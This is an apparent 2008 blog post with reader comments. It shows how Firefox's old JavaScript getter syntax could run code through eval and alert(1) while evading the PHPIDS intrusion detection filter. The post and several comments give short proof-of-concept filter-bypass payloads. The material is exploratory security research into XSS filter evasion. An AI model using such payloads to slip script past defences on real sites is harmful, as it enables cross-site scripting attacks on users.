I’m a big fan of strange looking Javascript and using the syntax in ways it wasn’t intended, so I can understand the internals of what’s going on. Tonight I was having trouble sleeping and I decided to try and bypass the PHPIDS, I found that Firefox lets you use getters with unassigned variables and returns the results.
the=javascript getter=eval
s = me getter=the('alert(1)')
Comments 3
Firefox doesn’t check the syntax before the function is executed, here’s another example:-
Posted 08 May 2008 at 1:56 am ¶Works getter = alert(1)
LOL:-
getter getter=alert(1)
One more and I’ll stop…
Posted 08 May 2008 at 1:57 am ¶getter setter=getter setter=eval(’alert(1)’)
very nice. i think i like that last one the best. it continues to amaze me how many different ways you can write Javascript and still get it to work.
Posted 08 May 2008 at 7:41 pm ¶Post a Comment